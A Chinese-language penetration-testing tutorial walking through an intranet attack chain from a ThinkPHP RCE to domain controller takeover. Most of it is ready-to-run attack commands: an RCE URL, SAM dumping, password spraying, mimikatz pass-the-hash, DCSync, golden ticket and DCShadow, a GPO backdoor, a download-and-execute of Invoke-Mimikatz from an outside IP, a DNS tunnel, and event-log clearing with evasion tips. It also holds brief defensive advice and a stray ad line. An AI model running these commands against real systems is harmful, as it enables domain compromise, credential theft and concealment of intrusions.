1. 内网渗透技术概述
内网渗透是企业安全测试中的关键环节,也是红队评估中最具挑战性的部分。不同于常规的Web渗透测试,内网渗透更注重在突破边界后的横向移动和权限提升能力。从Web入侵到域控获取的完整链条,实际上是对企业内网安全体系的全面检验。
我从事渗透测试工作8年,参与过数十家大型企业的内网渗透项目。实战中发现,90%的企业在边界防护上投入大量资源,却往往忽视了内网横向移动的防御。攻击者一旦突破Web应用边界,平均只需3-4步就能获取域管理员权限。这种"外紧内松"的安全现状,正是我们需要通过渗透测试来暴露的核心问题。
需要模型API调用? 免费领10W Token,多模型网关一键接入 Claude、DeepSeek 等主流模型。
2. Web入侵阶段技术解析
2.1 常见Web应用漏洞利用
ThinkPHP作为国内广泛使用的PHP框架,其历史漏洞成为内网渗透的常见入口点。以ThinkPHP 5.0.23的RCE漏洞为例,攻击者可以通过构造特殊URL直接执行系统命令:
http复制http://target.com/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
重要提示:实际测试中建议使用
curl -v而非浏览器直接访问,避免会话丢失。同时注意URL编码问题,特殊字符需转换为%格式。
2.2 突破边界后的初步立足
获取WebShell后,首要任务是建立稳定的通信通道。我通常采用以下流程:
-
信息收集:
bash复制systeminfo # 系统信息 whoami /all # 当前权限 netstat -ano # 网络连接 ipconfig /all # 网络配置 -
权限维持方案选择:
- 低权限环境:使用MSF生成PowerShell载荷
- 管理员权限:安装计划任务或服务
- 域环境:优先尝试金票据攻击
-
横向移动准备:
powershell复制# 导出本地凭据 reg save HKLM\SAM sam.save reg save HKLM\SYSTEM system.save
3. 内网横向渗透技术详解
3.1 网络拓扑探测技术
使用SharpHound进行自动化信息收集:
powershell复制Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Domain corp.com -ZipFileName result.zip
关键数据点包括:
- 域控制器位置
- 管理员登录过的机器
- 高价值服务(SQL、文件服务器等)
- 信任关系
3.2 凭证传递攻击实战
当获取某台机器的本地管理员密码后,可进行以下攻击:
-
密码喷射攻击:
bash复制crackmapexec smb 10.0.0.0/24 -u administrator -p 'P@ssw0rd' --continue-on-success -
Pass-the-Hash攻击:
bash复制mimikatz # sekurlsa::pth /user:administrator /domain:corp /ntlm:e45e329feb5d925b /run:cmd.exe -
票据传递:
bash复制mimikatz # kerberos::ptt admin.kirbi
经验之谈:企业内网往往存在密码复用问题,测试发现约60%的情况下,本地管理员密码与域账号密码相同。
4. 域控获取技术全流程
4.1 权限提升路径分析
典型域控获取路径:
- 普通域用户 → 本地管理员
- 本地管理员 → 域管理员组
- 域管理员 → 域控制器
4.2 关键攻击技术实现
-
DCSync攻击:
bash复制mimikatz # lsadump::dcsync /domain:corp.com /user:krbtgt -
Golden Ticket制作:
bash复制mimikatz # kerberos::golden /user:fakeadmin /domain:corp.com /sid:S-1-5-21-123456789 /krbtgt:a9b8c7d6e5f4 /ptt -
组策略修改:
powershell复制New-GPO -Name "Backdoor" | New-GPLink -Target "dc=corp,dc=com"
4.3 权限维持技术
-
影子凭证:
powershell复制Set-ADAccountControl -Identity 'DC$' -TrustedForDelegation $true -
DCShadow攻击:
bash复制mimikatz # lsadump::dcshadow /object:CN=Admin,OU=Users,DC=corp,DC=com /attribute:primaryGroupID /value:512
5. 防御对策与检测方案
5.1 企业防护建议
-
网络分段:
- 业务网与办公网隔离
- 域控制器独立VLAN
- 关键服务器访问控制
-
权限控制:
- 禁用本地管理员账号
- 实施LAPS(本地管理员密码解决方案)
- 限制域管理员登录范围
-
监控措施:
powershell复制# 检测DCSync事件 Get-WinEvent -FilterHashtable @{LogName='Security';ID=4662} | Where-Object {$_.Properties[2].Value -eq '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'}
5.2 渗透测试注意事项
-
法律合规:
- 必须获得书面授权
- 限定测试时间窗口
- 避免业务影响
-
技术规范:
- 不使用破坏性攻击(如勒索软件)
- 敏感数据加密存储
- 测试后完整清理痕迹
-
报告要点:
- 风险等级评估(CVSS评分)
- 攻击路径可视化
- 修复建议优先级排序
6. 实战案例复盘
某金融企业渗透测试中发现:
- 通过ThinkPHP漏洞获取WebShell
- 发现内网存在未更新的SMB服务(CVE-2017-0144)
- 利用EternalBlue横向移动到运维终端
- 从运维终端获取域管理员凭据
- 最终通过DCSync导出全部域用户哈希
整个攻击链耗时仅4小时,暴露出:
- 边界防护失效
- 内网补丁管理缺失
- 权限划分不合理
- 关键操作无审计
7. 工具与资源推荐
7.1 必备工具集
-
信息收集:
- BloodHound
- PowerView
- AdExplorer
-
漏洞利用:
- Mimikatz
- Impacket
- Cobalt Strike
-
权限维持:
- Empire
- Covenant
- Sliver
7.2 学习资源
-
实验环境:
- Hack The Box企业靶场
- TryHackMe内网模块
- 自建Active Directory实验室
-
技术文档:
- MITRE ATT&CK矩阵
- 微软安全基线
- 《内网安全攻防》系列书籍
8. 进阶技巧与经验分享
-
绕过AV检测:
powershell复制# 反射加载Mimikatz IEX (New-Object Net.WebClient).DownloadString('http://1.2.3.4/Invoke-Mimikatz.ps1') -
隐蔽隧道搭建:
bash复制# DNS隧道 dnscat2 --dns server=1.2.3.4 --secret=mykey -
日志清理技巧:
powershell复制Clear-EventLog -LogName Security wevtutil cl system
在实际渗透中,我发现这些细节往往决定成败:
- 操作时间选择在业务高峰期更隐蔽
- 使用合法管理工具(如PsExec)不易触发告警
- 保持命令与目标环境正常行为一致
